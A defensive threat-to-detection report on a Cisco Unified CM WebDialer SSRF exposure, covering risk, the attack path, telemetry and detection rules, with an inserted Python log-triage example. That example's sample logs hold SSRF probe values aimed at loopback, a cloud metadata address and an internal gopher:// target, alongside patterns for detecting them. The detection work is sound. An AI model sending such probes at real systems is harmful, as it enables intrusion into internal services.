[TTD] Cisco Unified CM WebDialer SSRF and Voice Control-Plane Appliance Compromise Exposure

Report Type: Threat-to-Detection
Threat Category: Exploitation / Voice-Control-Plane Appliance Compromise
Assessment Date: June 24, 2026
Primary Impact Domain: Communications Infrastructure Trust and Availability
Secondary Impact Domains: Administrative Control, Call-Routing Integrity, Route-Plan Integrity, Service-State Reliability, Incident-Response Communications, Customer-Support Continuity, Regulatory and Business-Continuity Exposure
Affected Asset Class: Cisco Unified Communications Manager, Cisco Unified CM Session Management Edition, WebDialer-Enabled Voice-Control-Plane Appliances, Voice-Management Infrastructure, Reverse Proxies, Load Balancers, Management Interfaces, Provider-Support Access Paths
Threat Objective Classification: Voice-Control-Plane Access, Trusted Appliance Context Abuse, Rare Egress Enablement, Administrative Change, Service Manipulation, Route-Plan or Call-Routing Impact, Communications Disruption

Published by: CyberDax LLC
Author: Edward “Tony” Dolley
Role: Founder / Principal Threat Researcher, CyberDax LLC
Publication Date: June 24, 2026
Publication Type: Cybersecurity Research Report / White Paper

BLUF

Cisco Unified Communications Manager and Unified CM Session Management Edition exposure through WebDialer server-side request forgery creates a voice-control-plane risk because unauthenticated remote activity against affected WebDialer handling can force unintended backend request behavior through a trusted appliance context. In environments where WebDialer is enabled and reachable through management, reverse-proxy, load-balancer, VPN, provider-managed, or internet-adjacent paths, the detection requirement extends beyond patch status into WebDialer access behavior, source legitimacy, backend-fetch indicators, rare appliance egress, administrative change, service-state change, file activity, route-plan change, call-routing change, and voice-service instability.

This TTD does not treat the exposure as a single-CVE string-matching problem. It treats the vulnerability as a reusable detection model for externally reachable voice-management services where suspicious HTTP request handling can bridge into trusted appliance behavior. The priority for defenders is to identify suspicious WebDialer activity, enrich it with Cisco Unified CM / Unified CM SME asset and WebDialer enablement context, and correlate it with follow-on evidence of rare egress, control-plane manipulation, appliance-side compromise, or operational voice-service impact.

Executive Risk Translation

Cisco Unified CM and Unified CM SME commonly support enterprise voice routing, click-to-call workflows, directory-integrated communications, customer support paths, contact-center routing, and internal business communications. A WebDialer SSRF path is therefore not only a web-layer issue. It can become a voice-control-plane trust issue where suspicious HTTP activity against a communications appliance may lead to internal request abuse, unauthorized administrative activity, route-plan manipulation, call-routing change, service instability, or loss of confidence in systems that support customer contact, incident response, emergency coordination, and executive communications.

S5. Executive Risk Summary

Cisco Unified CM / Unified CM SME WebDialer exposure creates a high-priority detection and response concern because exploitation can originate remotely and target systems that often sit at the intersection of telephony, identity, directory services, call routing, and business continuity. The most important business risk is not only unauthorized interaction with a vulnerable service, but the possibility that a voice-control-plane appliance becomes a trusted pivot point for internal request activity, administrative change, rare egress, service disruption, or downstream operational impact.

The highest-risk environments are those where WebDialer is enabled, access paths are exposed beyond tightly controlled internal workflows, reverse-proxy or load-balancer logs do not preserve URI and query details, Unified CM administrative audit logs are incomplete, and rare appliance egress is not baselined. In those environments, defenders may only see fragments of the behavior: an unusual WebDialer request, a rare outbound connection, a service restart, a route-plan change, a call-routing anomaly, or voice-service instability. The value of this TTD is to connect those fragments into a behavior-led detection model.

The detection strategy focuses on suspicious WebDialer access and its relationship to rare egress, administrative change, file or service activity, route-plan change, call-routing change, and voice-control-plane instability. The S25 rule set supports NDR / Network Behavioral Analytics, SentinelOne, Splunk, Elastic, QRadar, and SIGMA coverage while avoiding unsupported cloud-only or malware-signature coverage.

S6. Executive Cost Summary

Low Impact Scenario

Estimated exposure: $85,000 to $275,000

A low-impact event involves suspicious WebDialer activity or exploitation attempts against a Cisco Unified CM / Unified CM SME environment where patching, WebDialer restriction, segmentation, logging, and administrative audit controls limit follow-on impact. Costs are driven by emergency validation, WebDialer exposure review, firewall and proxy log analysis, Unified CM administrative audit review, temporary WebDialer disablement or restriction, call-control integrity validation, and targeted detection deployment.

Moderate Impact Scenario

Estimated exposure: $275,000 to $950,000

A moderate-impact event involves suspicious WebDialer activity with credible follow-on evidence such as rare Unified CM egress, abnormal management-plane activity, suspicious administrative activity, service restart, file modification, route-plan change, call-routing change, or degraded confidence in voice-control-plane integrity. Costs are driven by incident response, forensic review, control-plane validation, call-routing verification, service restoration, change rollback, vendor escalation, communications disruption, helpdesk load, and enhanced monitoring across voice-management infrastructure.

High Impact Scenario

Estimated exposure: $950,000 to $4.2 million

A high-impact event involves confirmed appliance-side compromise, unauthorized administrator activity, malicious route-plan or call-routing modification, material voice-service disruption, sensitive configuration exposure, sustained communications outage, or loss of trust in Unified CM / Unified CM SME control-plane integrity. Costs are driven by emergency restoration, appliance rebuild or rollback, call-routing reconstruction, business communications disruption, contact-center or customer-support interruption, legal and regulatory review, executive communications, third-party incident response, and extended monitoring.

S6A. Key Cost Drivers

The primary cost driver is operational dependency on Cisco Unified CM / Unified CM SME for call routing, internal communications, customer-facing voice services, contact-center workflows, emergency coordination, incident response, and executive communications.

A second cost driver is the investigation burden created by SSRF-style behavior. Initial activity may appear as HTTP access to a legitimate WebDialer function, while the meaningful risk may appear later through backend request handling, rare egress, administrative change, service-state change, file activity, route-plan modification, or call-routing impact.

A third cost driver is control-plane trust validation. After suspicious activity, defenders may need to verify administrator accounts, route plans, call-routing rules, service status, configuration integrity, certificates, keys, backups, cluster state, directory integrations, and expected voice-platform egress before normal trust can be restored.

A fourth cost driver is telemetry maturity. Costs increase when URI paths and query strings are not retained, reverse-proxy logging is incomplete, Unified CM administrative audit telemetry is unavailable, file-integrity monitoring is not deployed, or rare egress baselines do not exist for voice-management assets.

A fifth cost driver is change-control ambiguity. Legitimate provider support, patch validation, monitoring, certificate management, backup jobs, route-plan changes, service restarts, and emergency remediation can resemble suspicious activity unless approved-source, approved-change, approved-maintenance, and baseline context are integrated into detection logic.

S6B. Compliance and Risk Context

Cisco Unified CM / Unified CM SME environments may support regulated communications, customer support lines, healthcare coordination, financial operations, emergency notification workflows, internal incident response, and executive communications. A compromise or loss of trust in the voice-control plane may create business-continuity, audit, legal, and customer-impact concerns even when the vulnerability itself is not primarily a data-theft issue.

Compliance exposure increases when suspicious WebDialer activity is followed by evidence of unauthorized administrative change, call-routing manipulation, service disruption, access to sensitive configuration files, certificate or key access, backup exposure, or unapproved egress from voice-management infrastructure. In those cases, the organization may need to demonstrate whether call routing, service availability, administrative access, and communications integrity remained intact.

Risk governance should treat this exposure as a control-plane integrity issue. Patching is necessary, but detection coverage should also validate WebDialer exposure, approved call-management workflows, administrative activity, appliance egress, route-plan integrity, service state, and voice-platform recovery readiness.

Risk Register Entry

Risk Title

Cisco Unified CM WebDialer SSRF and Voice-Control-Plane Appliance Compromise Exposure

Risk Description

Cisco Unified CM / Unified CM SME WebDialer exposure may allow suspicious external or unapproved source activity to abuse server-side request behavior through a trusted voice-control-plane appliance context. If follow-on activity occurs, the organization may face rare appliance egress, administrative change, file or service manipulation, route-plan change, call-routing impact, voice-service instability, or loss of trust in Unified CM control-plane integrity.

Affected Assets

Cisco Unified Communications Manager, Cisco Unified CM Session Management Edition, WebDialer-enabled assets, reverse proxies, load balancers, management interfaces, voice-management segments, administrator accounts, route-plan objects, call-routing configurations, service-state telemetry, file-integrity telemetry, monitoring systems, backup systems, and provider-support access paths.

Threat Event

Suspicious WebDialer access or SSRF-shaped request activity followed by rare Unified CM egress, administrative change, service manipulation, file activity, route-plan change, call-routing change, abnormal management access, or voice-service instability.

Business Impact

Potential communications disruption, call-routing integrity loss, contact-center interruption, customer-support degradation, incident-response communications disruption, emergency change activity, forensic investigation cost, service restoration cost, executive escalation, and reduced confidence in voice-control-plane integrity.

Likelihood

High where WebDialer is enabled, exposed beyond tightly controlled workflows, unpatched, weakly segmented, or insufficiently monitored.

Impact

High where Unified CM / Unified CM SME supports critical internal communications, customer-facing voice workflows, regulated operations, emergency response, or contact-center routing.

Inherent Risk Rating

High

Existing Controls

Cisco software updates, WebDialer restriction or disablement, network segmentation, WAF or reverse-proxy logging, firewall monitoring, administrative audit logging, approved-source controls, change-management processes, provider-access controls, backup procedures, and voice-platform monitoring.

Residual Risk

Moderate to high until WebDialer exposure is validated, patches are applied, suspicious WebDialer access is monitored, rare appliance egress is baselined, administrative and route-plan changes are audited, and S25 detection coverage is deployed across relevant platforms.

Recommended Treatment

Patch affected systems, disable or restrict WebDialer where not required, limit access to approved sources, preserve URI and query telemetry, baseline Unified CM egress, validate administrative audit logging, deploy S25 detection rules, monitor service and route-plan changes, and prepare voice-control-plane recovery procedures.

S10. Threat Overview

Cisco Unified CM and Unified CM SME WebDialer functionality can become a high-value exposure point when server-side request handling is reachable by untrusted or weakly controlled sources. The relevant threat model is unauthenticated or unapproved remote interaction with WebDialer-related HTTP request paths in a way that causes the appliance to process unintended backend request behavior from a trusted internal context.

The defensive concern is not limited to whether a single request matches a known exploit indicator. SSRF-style activity can be difficult to validate from one log line because the suspicious request may appear in web, reverse-proxy, load-balancer, WAF, or access telemetry, while the meaningful follow-on behavior may appear later in firewall, DNS, proxy, administrative audit, service-state, file-integrity, route-plan, call-routing, endpoint-adjacent, or NDR telemetry.

The threat should therefore be monitored as a behavior chain: suspicious WebDialer access, abnormal source or workflow context, SSRF-shaped request indicators, backend-fetch behavior, rare appliance egress, administrative or service-state change, file activity, route-plan or call-routing change, and voice-service instability. This TTD focuses on that chain rather than a single payload string.

S13. Targets and Exposure Surface

Primary Targets

Cisco Unified Communications Manager systems.

Cisco Unified CM Session Management Edition systems.

WebDialer-enabled Unified CM / Unified CM SME nodes.

Unified CM clusters and related voice-management infrastructure.

Management interfaces, reverse proxies, load balancers, VPN paths, and network zones that expose or route WebDialer traffic.

Secondary Targets

Administrative accounts used for Unified CM management.

Call-routing and route-plan configuration objects.

Service-state management functions.

Certificate, key, backup, and configuration stores.

Monitoring, backup, file-integrity, and provider-support systems with access to Unified CM infrastructure.

Voice-management subnets and NAT egress identities.

Exposure Conditions

WebDialer is enabled.

WebDialer access is reachable from untrusted, semi-trusted, provider-managed, remote-access, or internet-adjacent paths.

Reverse-proxy, WAF, or load-balancer telemetry does not preserve full URI and query details.

Unified CM administrative audit logs are incomplete or not forwarded to detection platforms.

Rare outbound communication from voice-control-plane assets is not baselined.

Approved source, approved workflow, approved provider support, and approved maintenance context are not integrated into detection logic.

S17. MITRE ATT&CK Chain Flow Mapping

Mapping Note

The MITRE ATT&CK mapping is intentionally narrow. It maps the observable behavior chain and likely follow-on activity used for detection engineering. It does not claim that every mapped technique occurs in every event.

Initial Access

T1190 - Exploit Public-Facing Application

Suspicious WebDialer access and SSRF-shaped request behavior against externally reachable or remotely accessible Unified CM / Unified CM SME WebDialer functionality maps most directly to exploitation of a public-facing or exposed application service.

Command and Control / Tool Transfer

T1105 - Ingress Tool Transfer

This mapping is conditional. It applies when follow-on telemetry shows rare outbound communication, file retrieval, transfer-tool execution, or appliance-adjacent activity consistent with downloading or staging external content after suspicious WebDialer activity.

Execution

T1059 - Command and Scripting Interpreter

This mapping is conditional. It applies only when follow-on telemetry shows unexpected shell, interpreter, command-line, service-wrapper, or endpoint-visible execution activity tied to the same Unified CM scope or supporting host.

Persistence / Server-Side Component Abuse

T1505 - Server Software Component

This mapping is conditional. It applies when follow-on telemetry shows suspicious file placement, service manipulation, application-writable path activity, or server-side component modification on or around Unified CM infrastructure.

Defense Evasion / Operational Concealment

T1562 - Impair Defenses

This mapping is conditional. It applies only where telemetry shows service disruption, logging impairment, monitoring bypass, or security-control interference tied to the same Unified CM scope.

Impact

T1499 - Endpoint Denial of Service

This mapping is conditional. It applies when suspicious WebDialer activity is followed by voice-service instability, service disruption, control-plane degradation, or communications availability impact.

S18. Attack Path Narrative

An attacker targets Cisco Unified CM / Unified CM SME WebDialer functionality through an exposed HTTP access path. The access path may be direct, reverse-proxied, load-balanced, VPN-mediated, provider-managed, or reachable through a management network.

The attacker sends WebDialer-related requests that deviate from approved click-to-call workflows, expected source ranges, expected user-agent patterns, or normal WebDialer request structure. The request may include SSRF-shaped indicators, backend-fetch behavior, encoded URL-like values, loopback or metadata-address references, abnormal response transitions, or failure-to-success behavior.

If the request is processed through the vulnerable path, the appliance may initiate unintended backend behavior from a trusted internal context. Defenders may observe the initial activity in WAF, reverse-proxy, load-balancer, web, or Cisco Unified CM access logs, while follow-on evidence may appear in firewall, DNS, proxy, NDR, administrative audit, service-state, file-integrity, route-plan, call-routing, endpoint-adjacent, or management-plane telemetry.

Post-exploitation behavior may include rare outbound communication, file creation or modification, service restart, administrative configuration change, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or endpoint-adjacent activity on supporting hosts.

The highest-confidence detection outcome occurs when suspicious WebDialer activity is correlated with rare Unified CM egress or voice-control-plane change using a stable Cisco Unified CM scope across node, cluster, backend host, management interface, NAT egress identity, administrator, or voice-management segment.

S20. TTP Analysis

WebDialer Access Abuse

The attacker interacts with WebDialer-related paths or parameters in ways that do not match approved click-to-call usage. Suspicious patterns include abnormal WebDialer path access, requests from unapproved sources, request bursts outside expected workflows, source reputation risk, and response anomalies.

SSRF-Shaped Request Behavior

The attacker attempts to influence server-side request handling through URL-like values, encoded scheme separators, loopback references, metadata-address references, backend host references, or abnormal parameter structures. The detection objective is not to match one exploit string, but to identify request patterns that indicate backend request abuse.

Trusted Appliance Context Abuse

Because SSRF behavior can cause a server to make requests from its own context, the appliance may become a trusted path into internal services, local interfaces, or backend functionality. This makes asset scope, WebDialer enablement state, source legitimacy, and backend behavior critical to triage.

Rare Egress

Follow-on communication from Unified CM / Unified CM SME nodes, backend hosts, management interfaces, NAT egress identities, or voice-management segments can indicate staging, callback, payload retrieval, or unintended backend request behavior. Detection should focus on destinations that are rare, unapproved, unknown reputation, suspicious reputation, newly observed, or outside the voice-platform baseline.

Control-Plane Change

Suspicious administrative changes, service restarts, file modifications, route-plan changes, call-routing changes, local user changes, certificate or key access, and voice-service instability may indicate compromise or operational impact. These events should be correlated with upstream WebDialer activity before being treated as exploit-linked.

Approved Activity Collision

Provider support, monitoring, vulnerability scanning, patch validation, certificate management, backup jobs, route-plan changes, service restarts, and emergency remediation can resemble suspicious follow-on activity. Detection content must include approved-source, approved-change, approved-maintenance, and baseline suppression to avoid over-alerting.

S20A. Adversary Tradecraft Summary

The tradecraft model is centered on abusing a legitimate voice-management web function to create unintended server-side behavior from a trusted appliance context. The first observable event may not look like compromise by itself. It may look like unusual WebDialer access, a strange query string, a response anomaly, or activity from an unexpected source.

The practical tradecraft sequence is:

· Identify WebDialer-enabled Cisco Unified CM / Unified CM SME exposure.

· Send abnormal WebDialer requests outside expected click-to-call workflows.

· Use SSRF-shaped request content or backend-fetch behavior to test appliance-side request handling.

· Observe response differences, error transitions, or success patterns.

· Attempt follow-on appliance-side behavior, rare egress, file activity, service manipulation, administrative change, route-plan change, call-routing change, or voice-service disruption.

· Blend or collide with legitimate provider support, scanning, monitoring, maintenance, or call-management integration traffic where possible.

The detection response should prioritize behavior correlation over string matching. A suspicious WebDialer request is a candidate signal. A suspicious WebDialer request followed by rare egress or voice-control-plane change is a higher-confidence compromise-path signal.

S21. Detection Strategy Overview

The detection strategy is to identify suspicious Cisco Unified CM / Unified CM SME WebDialer activity and correlate it with follow-on rare egress or voice-control-plane change. The strategy is behavior-led and does not depend on a single exploit string, actor name, IP address, or malware artifact.

Detection should begin with WebDialer access visibility from WAF, reverse-proxy, load-balancer, web, and Cisco Unified CM access telemetry. That activity should be enriched with Cisco Unified CM asset identity, WebDialer enablement state, approved-source context, approved workflow context, source reputation, and request-shape indicators.

Follow-on correlation should use network egress, DNS, firewall, proxy, NDR, administrative audit, service-state, file-integrity, route-plan, call-routing, endpoint-adjacent, and management-plane telemetry. The most important correlation key is a stable Cisco Unified CM scope that can connect node, cluster, backend host, management interface, NAT egress identity, administrator, and voice-management segment.

The highest-confidence detections combine suspicious WebDialer activity, Cisco Unified CM / Unified CM SME asset context, WebDialer-enabled context, rare egress or suspicious destination behavior, administrative or service-state change, and absence of approved maintenance, provider support, scanning, monitoring, or change context.


S22. Primary Detection Signals

Suspicious WebDialer Activity

Abnormal WebDialer access, requests from unapproved sources, access outside click-to-call workflows, abnormal WebDialer paths, SSRF-shaped query content, backend-fetch behavior, response anomalies, failure-to-success patterns, or source reputation risk.

Asset and Exposure Context

Cisco Unified CM / Unified CM SME asset identity, WebDialer enablement state, node identity, cluster identity, backend host, management interface, NAT egress identity, voice-management segment, and approved access path.

Rare Egress

Rare outbound connection, unexpected DNS query, newly observed destination, unapproved egress destination, suspicious or unknown destination reputation, egress from a voice-management segment, or egress not present in the Unified CM baseline.

Administrative and Service-State Change

Administrator creation or modification, administrative configuration change, abnormal management login, service restart, service modification, route-plan change, call-routing change, cluster communication anomaly, voice-service instability, or unusual service-state transition.

File and Host-Adjacent Activity

File creation, file modification, permission change, archive extraction, temporary path writes, configuration-file access, certificate or key access, backup export activity, unexpected shell activity, interpreter execution, process network connection, scheduled job creation, or local user modification.

Suppression and Context Signals

Approved WebDialer source, approved call-management integration, approved administrator, approved monitoring source, approved scanner, approved provider-managed source, approved patch validation, approved maintenance window, approved route-plan change, approved service restart, approved backup job, approved emergency remediation, and approved egress destination.

S23. Telemetry Requirements

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

NDR or network behavioral analytics telemetry.

Cisco Unified CM / Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Approved WebDialer source inventory.

Approved call-management integration inventory.

Approved administrator inventory.

Approved provider-support source inventory.

Approved scanner and monitoring source inventory.

Approved maintenance-window and change-control data.

Approved egress destination inventory.

Rare egress baseline for Unified CM / Unified CM SME nodes, management interfaces, NAT identities, and voice-management segments.

Endpoint or adjacent-host telemetry where available for management hosts, reverse proxies, monitoring hosts, backup hosts, file-integrity collectors, and voice-management support systems.

S24. Detection Opportunities and Gaps

Detection Opportunities

Suspicious WebDialer activity can be detected before confirmed compromise when defenders retain URI paths, query strings, source context, response status, and WebDialer workflow context.

Rare egress from Cisco Unified CM / Unified CM SME assets can provide strong follow-on evidence when voice-platform egress is tightly baselined.

Administrative audit and route-plan telemetry can expose control-plane manipulation that would not be obvious from web logs alone.

Service-state, file-integrity, and backup/export telemetry can help distinguish low-confidence probing from suspected appliance-side compromise.

QRadar CRE logic, Splunk summaries, Elastic transforms, NDR behavioral analytics, SentinelOne endpoint-visible telemetry, and SIGMA backend-convertible candidates provide complementary coverage when each platform is used for its proper role.

Detection Gaps

Detection is weakened where WebDialer access telemetry does not preserve full URI and query details.

Detection is weakened where Cisco Unified CM / Unified CM SME asset inventory is incomplete or WebDialer enablement state is unknown.

Detection is weakened where rare egress baselines do not exist for voice-control-plane assets.

Detection is weakened where Unified CM administrative audit logs, service-state telemetry, route-plan telemetry, and file-integrity telemetry are not forwarded to detection systems.

Detection is weakened where NAT, proxy, reverse-proxy, or load-balancer logs cannot reliably map activity back to the same Cisco Unified CM scope.

Detection is weakened where provider support, vulnerability scanning, monitoring, maintenance, route-plan changes, service restarts, and emergency remediation are not mapped into approved-change context.

S25. Ultra-Tuned Detection Engineering Rules

NDR / Network Behavioral Analytics

Detection Viability Assessment

Implementation-ready as an NDR, WAF, reverse-proxy, load-balancer, firewall, or SIEM correlation pattern where URI-preserving HTTP telemetry, Cisco Unified CM / Unified CM SME asset inventory, WebDialer enablement state, DNS/proxy/firewall telemetry, source-network context, response-size context, and voice-management telemetry can be joined to the same Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Pure NetFlow is not sufficient because this detection requires WebDialer URI visibility, source context, request/response behavior, backend identity, and downstream correlation. Use this rule as a behavioral correlation pattern when the customer can combine HTTP-layer WebDialer activity with network egress, administrative audit, service-state, file-integrity, route-plan change, or voice-control-plane telemetry.

Rule

Cisco Unified CM WebDialer SSRF Attempt With Rare Egress or Voice-Control-Plane Correlation

Rule Format

Vendor-neutral NDR / WAF / reverse-proxy / load-balancer behavioral correlation rule requiring target-platform syntax conversion, local field mapping, local lookup implementation, WebDialer telemetry validation, Cisco Unified CM / Unified CM SME asset validation, and customer-specific tuning before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM or Unified CM SME WebDialer activity that may indicate SSRF-oriented request handling, abnormal WebDialer parameter use, backend fetch behavior, rare outbound communication, or downstream voice-control-plane management behavior tied to the same Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Detection Logic

Trigger when a Cisco Unified CM or Unified CM SME appliance with WebDialer enabled receives HTTP activity involving WebDialer paths, WebDialer servlet routes, WebDialer API routes, locally confirmed WebDialer endpoint variants, or WebDialer request-normalization anomalies from a source that is not an approved voice administrator, approved call-management integration, approved WebDialer workflow, approved monitoring system, approved vulnerability scanner, approved patch-validation source, approved provider-managed source, or approved maintenance source.

Assign medium severity when suspicious WebDialer endpoint activity occurs against a Unified CM or Unified CM SME appliance outside approved testing, monitoring, provider support, patch validation, or maintenance.

Assign high severity when suspicious WebDialer endpoint activity aligns with SSRF-shaped request context such as loopback references, link-local targets, private address ranges, internal hostnames, nested URL parameters, unexpected URL schemes, encoded URL schemes, double-encoded destinations, backend fetch errors, unexpected Host header behavior, repeated failure-to-success patterns, abnormal response-size transitions, abnormal request-size transitions, or WebDialer parameters that do not align with approved click-to-call workflows.

Assign high severity when suspicious WebDialer endpoint activity is followed within the local WebDialer network-correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer endpoint activity is followed within the local control-plane correlation window by confirmed appliance-side file creation, file modification, service restart, administrative configuration change, route-plan modification, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, or administrative identity.

Promote to critical when two or more high-confidence paths converge, or when suspicious WebDialer activity is followed by confirmed appliance-side compromise evidence, root-level access evidence, unauthorized administrator creation, malicious route-plan change, confirmed service manipulation, confirmed file-write activity, confirmed command execution, confirmed voice-control-plane instability, or confirmed call-routing integrity impact.

Required Telemetry

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

NDR session telemetry.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM version inventory.

Cisco WebDialer enablement inventory.

URI path and query-string preservation.

HTTP method, URI path, query string, status code, user agent, request size, response size, virtual host, backend host, backend IP, and timestamp.

Source IP and forwarded source IP fields.

DNS logs.

Proxy logs.

Approved voice administrator source lookup.

Approved call-management integration lookup.

Approved WebDialer workflow lookup.

Approved monitoring source lookup.

Approved scanner lookup.

Approved provider-managed source lookup.

Approved patch-validation source lookup.

Approved maintenance-window lookup.

Approved Cisco Unified CM appliance lookup.

Approved Cisco Unified CM SME appliance lookup.

Approved voice-management subnet lookup.

Approved Cisco Unified CM destination lookup.

Recently seen destination-domain and destination-IP baseline.

Engineering Implementation Instructions

Map HTTP method, URI path, query string, full URL, source IP, X-Forwarded-For, normalized source IP, user agent, HTTP status, request size, response size, virtual host, backend host, backend IP, Cisco Unified CM cluster identifier, Cisco Unified CM node identifier, Cisco Unified CM role, WebDialer enablement state, source host, destination domain, destination IP, DNS query, proxy action, network action, NAT egress identity, voice-management segment, administrator user, administrator action, service name, service action, file path, file action, route-plan object, call-routing change, and event timestamp fields to the customer’s local schema.

Normalize URL and query-string values before correlation. Decode URL-encoded values where safely available, preserve the original raw request fields for investigation, and create a combined normalized request field from URI path, query string, and full URL so defenders can identify private IP references, loopback references, link-local references, internal hostnames, nested URL parameters, unexpected URL schemes, and encoded destinations without requiring request-body logging.

Normalize source identity carefully. When X-Forwarded-For exists, extract the original client IP from the forwarded chain using the customer’s trusted-proxy policy rather than treating the entire X-Forwarded-For field as a single source IP. Preserve the full forwarded chain for triage.
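Worked example for the two normalization steps above, added here and not part of the CyberDax report or of any Cisco component: a Python triage helper that parses constructed reverse-proxy log lines, derives the client from the forwarded chain under a trusted-proxy list, percent-decodes the URL with a bound while keeping the raw fields, and tags the RequestParameterRisk categories the rule uses. The key=value log format, the /webdialer/Webdialer path, the destination parameter name, the trusted-proxy addresses and the internal DNS suffixes are assumptions for illustration.

```python
"""Added example, not CyberDax's or Cisco's code: normalize WebDialer request
fields from constructed proxy log lines and tag SSRF-shaped indicators.
Log format, paths, parameter names, proxies and suffixes are assumptions."""
import ipaddress
import shlex
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, unquote, urlsplit

TRUSTED_PROXIES = {"10.20.0.5", "10.20.0.6"}   # assumed trusted-proxy policy
INTERNAL_SUFFIXES = (".voice.corp.example", ".corp.example", ".internal")  # assumed
URL_SCHEMES = ("http://", "https://", "file://", "gopher://", "ftp://")

# Constructed log lines (not real telemetry); key=value, quoted where needed.
SAMPLE_LOG = [
    'ts=2026-06-24T10:01:02Z remote=10.20.0.5 xff="10.40.1.15, 10.20.0.6" url="/webdialer/Webdialer?cmd=dial&destination=1001" status=200',
    'ts=2026-06-24T10:05:41Z remote=10.20.0.5 xff="203.0.113.9" url="/webdialer/Webdialer?cmd=dial&destination=http%3A%2F%2F127.0.0.1%3A8443%2Fstatus" status=500',
    'ts=2026-06-24T10:05:43Z remote=10.20.0.5 xff="203.0.113.9" url="/webdialer/Webdialer?cmd=dial&destination=http%253A%252F%252F169.254.169.254%252F" status=500',
    'ts=2026-06-24T10:05:50Z remote=10.20.0.5 xff="203.0.113.9" url="/webdialer/Webdialer?cmd=dial&destination=gopher://cucm-sub1.voice.corp.example:2000/" status=500',
    'ts=2026-06-24T10:09:12Z remote=203.0.113.50 xff="10.40.1.15" url="/webdialer/Webdialer?cmd=dial&destination=1002" status=200',
]

@dataclass
class NormalizedRequest:
    client_ip: str
    client_chain: list        # full forwarded chain, preserved for triage
    raw_url: str              # raw request field, preserved for investigation
    normalized_url: str
    decode_depth: int
    risks: set = field(default_factory=set)

def parse_log_line(line):
    """Split a key=value line; shlex keeps quoted values with spaces intact."""
    return dict(token.partition("=")[::2] for token in shlex.split(line))

def client_ip_from_chain(remote_addr, xff):
    """Walk from the peer inward, skipping trusted proxies; the first untrusted
    hop is the client. An untrusted peer means X-Forwarded-For is unverified,
    so the peer itself is the client."""
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    chain = hops + [remote_addr]
    for hop in reversed(chain):
        if hop not in TRUSTED_PROXIES:
            return hop, chain
    return remote_addr, chain

def decode_bounded(value, max_depth=3):
    """Percent-decode repeatedly, bounded, counting layers that changed the value."""
    depth = 0
    while depth < max_depth:
        decoded = unquote(value)
        if decoded == value:
            break
        value, depth = decoded, depth + 1
    return value, depth

def classify_value(value):
    """Tag one decoded parameter value with the rule's RequestParameterRisk labels."""
    risks, lowered, host, nested = set(), value.lower(), None, False
    for scheme in URL_SCHEMES:
        pos = lowered.find(scheme)
        if pos != -1:
            nested = True
            risks.add("nested_url_parameter")
            if scheme not in ("http://", "https://"):
                risks.add("unexpected_url_scheme")
            host = urlsplit(lowered[pos:]).hostname or ""
            break
    if host is None:
        host = lowered.strip()             # a bare address in the parameter
    try:
        addr = ipaddress.ip_address(host)
        if addr.is_loopback or addr.is_unspecified:   # 127.0.0.0/8, ::1, 0.0.0.0
            risks.add("loopback_reference")
        elif addr.is_link_local:                      # 169.254.0.0/16, fe80::/10
            risks.add("link_local_reference")
        elif addr.is_private:                         # RFC 1918 and similar
            risks.add("private_address_reference")
    except ValueError:
        if host == "localhost":
            risks.add("loopback_reference")
        elif host.endswith(INTERNAL_SUFFIXES) or (nested and host and "." not in host):
            risks.add("internal_hostname_reference")
    return risks

def has_scheme(text):
    return any(s in text.lower() for s in URL_SCHEMES)

def normalize_request(remote_addr, xff, raw_url):
    client_ip, chain = client_ip_from_chain(remote_addr, xff)
    normalized, depth = decode_bounded(raw_url)
    req = NormalizedRequest(client_ip, chain, raw_url, normalized, depth)
    for _name, value in parse_qsl(urlsplit(normalized).query, keep_blank_values=True):
        req.risks |= classify_value(value)
    if depth >= 2:
        req.risks.add("double_encoded_destination")
    if depth >= 1 and has_scheme(normalized) and not has_scheme(raw_url):
        req.risks.add("encoded_url_scheme")   # scheme became visible only after decoding
    return req

def triage(lines=SAMPLE_LOG):
    """One NormalizedRequest per log line, in input order."""
    return [normalize_request(f["remote"], f.get("xff", ""), f["url"])
            for f in map(parse_log_line, lines)]
```

Two points to carry into the platform translation: the decode loop is bounded and records its depth, which is what makes double_encoded_destination a reportable fact rather than a guess, and the forwarded-chain walk starts at the peer address, so a spoofed X-Forwarded-For arriving from an untrusted peer never becomes the source identity.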

Build the Cisco Unified CM and Unified CM SME asset groups from CMDB records, vulnerability-management inventory, Cisco voice-platform inventory, DNS records, reverse-proxy routing, load-balancer target groups, firewall objects, management subnet inventories, Cisco Unified CM cluster records, and WebDialer enablement records.

Create and validate local lookups for approved voice administrators, approved WebDialer integrations, approved call-management applications, approved monitoring systems, approved vulnerability scanners, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved Cisco Unified CM appliances, approved Unified CM SME appliances, approved management subnets, approved outbound destinations, approved internal call-control systems, approved directory services, approved backup systems, approved DNS and NTP services, and recently seen destination baselines.

Validate URI visibility before deployment. This rule requires URI-preserving WAF, reverse-proxy, load-balancer, web access, application-layer, or server-side logging. Pure NetFlow, encrypted traffic without HTTP metadata, or firewall-only telemetry is not sufficient for WebDialer request detection.

